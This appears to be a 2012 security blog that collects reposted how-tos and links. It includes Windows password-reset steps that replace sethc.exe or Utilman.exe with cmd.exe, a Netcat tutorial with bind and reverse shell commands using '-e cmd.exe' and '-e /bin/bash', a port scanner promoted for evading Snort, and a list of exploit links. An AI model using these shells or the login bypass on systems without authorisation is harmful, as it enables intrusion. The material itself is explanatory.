Dec 15, 2012

PHP Application Security Checklist

Download it from Source.


Source: http://www.sk89q.com/content/2010/04/phpsec_cheatsheet.pdf 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 14, 2012

Howto: Reset a forgot password Windows 7

This post just summary the step from the Source, if you want to see the picture of each step, please go to the Source. 

1. Create the System Repair Disk(Start button -> All Programs -> Maintenance -> Create a System Repair Disk

2. Reboot and load the System Repair Disk

3. In the menu after choose disk, click Command Prompt

4. copy c:\windows\system32\sethc.exe c:

5. copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

6. Reboot and wait in Login Screen

7. hit the Shift button 5 times, you will get command prompt

8. Type the command "net user username password"

9. Now you can login with your new password

10. If you want to take the execute to be the past, use
copy c:\sethc.exe c:\windows\system32\sethc.exe     


Source: http://reboot.pro/topic/15751-reset-a-forgotten-windows-7-password-without-using-any-third-party-software-how-to-tutorial/ 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Reset a forgotten Windows 8 Password

This post just summary the step from the Source, if you want to see the picture of each step, please go to the Source.

1. Make a System Rescure CD (Go to control panel and navigate to Windows 7  File Recovery, click on that icon, and from the next screen choose from the top left ( Create a System Recovery Disk ) and follow the on-screen instructions to make that CD.)

2. Reboot windows and take the boot into your System Rescue CD.

3. When you're in the System Rescue CD, choose Troubleshoot -> Advance options -> Command Prompt

4. In the command prompt, run 'diskpart'

5. In the diskpart, run 'list vol'

6. Locate the windows partition, normally it will be C

7. Exit to the Command prompt with exit command

8. Type C: -> cd windows/system32/

9. Replace cmd.exe with Utilman.exe, del Utilman.exe -> ren cmd.exe Utilman.exe (You should back up each files before replace it.)

10. Restart with "shutdown -r -t 00"

11. Now when you're restart, Click the "Ease Of Access Center" in the left corner of login screen.

12. Now you will find the Command Prompt.

13. Type "net user" for list user in the PC.

14. Type "net user administrator *" for change administrator password, you can change administrator to another user that you want to change his/her password.

15. Change password

16. Exit to login screen and use your new password for login into the windows 8

17. Now you want to roll back into the previous command, use
 17.1 Type: c: 
 17.2 Type:  cd /windows/system32/
 17.3 Type:  del  Utilman.exe
 17.4 Type:  ren  Utilman.exe.original Utilman.exe

 17.5 Type: ren cmd.exe.original cmd.exe
 17.6 Type: shutdown  -r  -t  00 

Source: http://reboot.pro/topic/17872-reset-a-windows-8-password-without-using-any-third-party-software/
     

   

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 13, 2012

Howto: Netcat: TCP/IP Swiss Army Knife

Port Scanning: The act of systematically scanning a host for open ports. Once determined, these open ports can be utilized to gain access to the host or to launch an attack.
Banner Grabbing: A fingerprinting technique aimed at extract information about a host such as operating system, web server, applications etc. A simple form of banner grabbing is to send a request and analyze the response received.
Port Redirection: A simple technique used to transfer traffic from one port to another. It is utilized to access services which are restricted in any specific environment.
Honeypot: A Honeypot is a monitored decoy used to attract attackers away from critical resources and also a tool to analyze an attacker’s methods and characteristics. It can emulate various services provided by an OS and also generate responses for those services. It provides an environment which is capable of interacting with an attacker and monitors his/her activities without any real resources at risk.
First of all let’s see all the options provided by Netcat:
root@bt:~# nc -h
[v1.10-38]
connect to somewhere: nc [-options] hostname port[s] [ports] …
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e’; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t -t answer TELNET negotiation
-u UDP mode
-v -v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. ‘ftp\-data’).


1.Client-Server
1.1. Server
 nc –l –p 9999
1.2. Client
 nc server_ip 9999

2. Port Scanning
nc –v –w 2 –z target_ip1-204

3. Banner Grabbing
nc –vv target_ip 80







4. Port Forwarding
nc –l –p listen_port –c “nc destination destionation_port″

5. File Transfer
5.1 Server
nc -lv -p 9999 > save.file
5.2 Client
nc target_ip 9999 < target.file

6. Honeypot For this we need to set up Netcat in listen mode on a specific port and send a user-defined output to the incoming connection.
nc –lvvp 443 < apache2.txt
nc target_ip 443

7. Backdoor
Bind Shell
7.1 Victim
nc –lvvp 9999 –e cmd.exe
7.2 Hacker
nc –v victim_ip 9999

Reverse Shell
7.1 Victim
nc –lvvp 9999
7.2 Hacker
nc –v victim_ip 9999 -e /bin/bash


Source: http://resources.infosecinstitute.com/netcat-tcpip-swiss-army-knife/


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 12, 2012

Topera - TCP Port Scanner IPV6

Topera is a brand new TCP port scanner under IPv6, with the particularity that these scans are not detected by Snort.  

Source: http://code.google.com/p/topera/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Interesting Exploit in 2012-12-12

1. Snare Agent Linux Password Disclosure / CSRF Vulnerabilities
 http://1337day.com/exploit/19941

2.  Smartphone Pentest Framework 0.1.3 / 0.1.4 Command Injection
http://1337day.com/exploit/19942

3. Nagios Core 3.4.3 Buffer Overflow Vulnerability
http://1337day.com/exploit/19943

4. WordPress 3.5 multiple path disclosure vulnerabilities
http://1337day.com/exploits/19944

5. Microsoft windows remote desktop PoC C# Exploit
http://1337day.com/exploit/19946

6. WordPress ABC Test Plugin 0.1 Cross Site Script XSS
http://1337day.com/exploit/19947

7. WordPress ABC Test Plugin directory traversal
http://1337day.com/exploit/19948






If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

WiFi Monitor Mode with Android PCAP Capture

Required:
- Android device which supports USB host mode(such as the Galaxy Nexus or Nexus 7 should work)

- Wireless USB Adapter with RTL8187 chipset.

 
1. Install “Android PCAP Capture“ that was created by Mike “dragorn” Kershaw,

2. Connect USB On-The-Go to Android and wireless usb device.

3. Open Android PCAP Capture And start capture the traffic with your wireless usb device.

4. Transfer the pcap to your PC, to analysis the pcap file.


Source: http://www.thepowerbase.com/2012/12/wifi-monitor-mode-with-android-pcap-capture/


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Honeyproxy - Proxy to analysis HTTP(S) traffic


Features

  • Analyze HTTP(S) traffic on the fly
  • Filter and highlight traffic, regex support included.
  • Save HTTP conversations for later analysis
  • Make scripted changes with Python, e.g. remove Cache Header.
  • based on and compatible to mitmproxy.
  • cross-platform (Windows, OSX and Linux)
  • SSL interception certs generated on the fly 
Source: http://honeyproxy.org/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 10, 2012

Zeroday Of Authentication bypass FreeSSHD / FreeFTPD

Authentication bypass FreeSSHD / FreeFTPD
Posted on: December 9, 2012
Source: BUGTRAQ
SecurityVulns ID: 12755
Type: remote
Danger: 6/10
Description: Completion of the authorization is not checked when initiating client ssh session
Affected: WeOnlyDo : FreeSSHd 1/2
  WeOnlyDo : FreeFTPD 03/02
Files: FreeSSHD all version Remote Authentication Bypass ZERODAY

FreeFTPD all versions Remote System Level Exploit Zero-Day
Discuss: Read or leave comments to the news (0 comments)

Source: http://securityvulns.ru/news/FreeSSHD/AB.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |